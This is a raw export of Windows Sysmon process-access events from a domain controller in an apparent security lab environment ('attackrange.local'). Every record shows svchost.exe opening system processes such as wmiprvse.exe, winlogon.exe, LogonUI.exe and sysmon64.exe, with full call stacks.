12:02:09.692{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003988Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.692{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003987Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.692{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003986Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.692{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003985Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.692{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003984Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.692{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003983Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.692{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003982Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.676{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003981Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.676{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003980Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.676{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003979Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.676{266CAFBE-646C-6064-1000-00000000AE01}11242372C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003978Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.676{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003977Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.676{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003976Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.676{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003975Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.676{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003974Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.676{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003973Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.676{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003972Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.676{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003971Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.676{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003970Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.676{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003969Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.661{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003968Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.661{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003967Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.661{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003966Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.661{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003965Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.661{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003964Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 